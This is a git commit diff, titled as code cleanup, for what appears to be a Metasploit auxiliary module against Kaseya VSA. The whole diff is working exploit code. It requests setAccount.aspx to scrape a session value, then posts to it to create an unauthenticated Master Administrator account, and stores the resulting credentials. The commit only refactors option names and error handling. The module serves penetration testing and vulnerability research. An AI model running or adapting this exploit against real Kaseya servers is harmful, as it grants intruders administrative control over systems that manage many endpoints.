Do code cleanup

2015-10-01 13:37:18 -05:00 · 2015-10-01 13:37:18 -05:00 · 1b21cd9481
parent 8af5a8e310
commit 1b21cd9481
1 changed files with 64 additions and 60 deletions
--- a/modules/auxiliary/admin/http/kaseya_master_admin.rb
+++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb
@ -36,9 +36,9 @@ v9.0.0.3.

    register_options(
      [
-        OptString.new('TARGETURI', [ true,  "The Kaseya VSA URI", '/']),
-        OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
-        OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),
+        OptString.new('TARGETURI', [ true,  'The Kaseya VSA URI', '/']),
+        OptString.new('KASEYA_USER', [true, 'The username for the new admin account', 'msf']),
+        OptString.new('KASEYA_PASS', [true, 'The password for the new admin account', 'password']),
        OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc'])
      ], self.class)
  end
@ -46,29 +46,38 @@ v9.0.0.3.

  def run
    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, "/LocalAuth/setAccount.aspx"),
+      'uri' => normalize_uri(target_uri.path, 'LocalAuth', 'setAccount.aspx'),
      'method' =>'GET',
    })

-    if res and res.body =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/
-      sessionVal = $1
-      print_status("#{peer} - Got sessionVal " + sessionVal + ", creating Master Administrator account")
+    if res && res.body && res.body.to_s =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/
+      session_val = $1
+    else
+      print_error("#{peer} - Failed to get sessionVal")
+      return
+    end
+
+    print_status("#{peer} - Got sessionVal #{session_val}, creating Master Administrator account")

    res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, "/LocalAuth/setAccount.aspx"),
+      'uri' => normalize_uri(target_uri.path, 'LocalAuth', 'setAccount.aspx'),
      'method' =>'POST',
      'vars_post' => {
-          "sessionVal" => sessionVal,
-          "adminName" => datastore['USERNAME'],
-          "NewPassword" => datastore['PASSWORD'],
-          "confirm" => datastore['PASSWORD'],
-          "adminEmail" => datastore['EMAIL'],
-          "setAccount" => "Create"
+        'sessionVal' => session_val,
+        'adminName' => datastore['KASEYA_USER'],
+        'NewPassword' => datastore['KASEYA_PASS'],
+        'confirm' => datastore['KASEYA_PASS'],
+        'adminEmail' => datastore['EMAIL'],
+        'setAccount' => 'Create'
      }
    })

-      if res and res.code == 302 and res.body =~ /\/vsapres\/web20\/core\/login\.asp/
-        print_good("#{peer} - Master Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']} created")
+    unless res && res.code == 302 && res.body && res.body.to_s.include?('/vsapres/web20/core/login.asp')
+      print_error("#{peer} - Master Administrator account creation failed")
+      return
+    end
+
+    print_good("#{peer} - Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created")
    service_data = {
      address: rhost,
      port: rport,
@ -76,12 +85,13 @@ v9.0.0.3.
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
+
    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_type: :password,
-          private_data: datastore['PASSWORD'],
-          username: datastore['USERNAME']
+      private_data: datastore['KASEYA_PASS'],
+      username: datastore['KASEYA_USER']
    }

    credential_data.merge!(service_data)
@ -93,11 +103,5 @@ v9.0.0.3.
    }
    login_data.merge!(service_data)
    create_credential_login(login_data)
-      else
-        print_error("#{peer} - Master Administrator account creation failed")
-      end
-    else
-      print_error("#{peer} - Failed to get sessionVal")
-    end
  end
 end